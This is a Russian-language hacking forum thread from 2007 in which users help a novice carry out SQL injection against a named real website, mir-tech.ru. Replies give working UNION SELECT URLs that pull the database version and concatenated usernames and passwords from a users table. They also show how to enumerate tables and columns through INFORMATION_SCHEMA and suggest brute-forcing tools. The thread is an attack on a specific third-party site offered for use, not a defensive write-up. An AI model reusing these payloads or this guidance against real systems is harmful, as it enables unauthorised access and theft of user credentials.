19.08.2007, 16:15
|
|
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами:
10058475
Репутация:
-5
|
|
SQL-inj
Вот SQL-inj
Код:
http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия? |
|
|
19.08.2007, 16:46
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
А там нет скули. Поищи другие скрипты
|
|
|
|
19.08.2007, 16:48
|
|
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами:
10058475
Репутация:
-5
|
|
Всмысле, ошибка же есть?
|
|
|
|
19.08.2007, 17:18
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами:
10467686
Репутация:
930
|
|
Там не смотрел, но вот тут она точно есть
Код:
хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(name,0x3a,password)+from+mai n_users/*
Последний раз редактировалось Ksander; 20.08.2007 в 14:11..
|
|
|
|
20.08.2007, 13:33
|
|
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами:
10058475
Репутация:
-5
|
|
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
|
|
|
|
20.08.2007, 13:46
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Можно вручную, либо специализированными программами-брутерами
|
|
|
|
20.08.2007, 14:02
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами:
10467686
Репутация:
930
|
|
Сообщение от Qwertison
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:
Код:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:
Код:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Последний раз редактировалось Ksander; 20.08.2007 в 14:33..
|
|
|
|
20.08.2007, 14:24
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Сообщение от Ksander
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:
Код:
union select TABLE_NAME from INFORMATION.SCHEMA_TABLES limit 0,1/*
А потом колонки в интересующей нас табле:
Код:
union select COLUMN_NAME from INFORMATION.SCHEMA_COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Все так, только
INFORMATION _SCHEMA .TABLES и INFORMATION _SCHEMA .COLUMNS
|
|
|
|
20.08.2007, 14:34
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами:
10467686
Репутация:
930
|
|
Сообщение от ENFIX
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
опечатался =)
|
|
|
|
20.08.2007, 13:48
|
|
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами:
10058475
Репутация:
-5
|
|
Какими например, я таких не видел.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
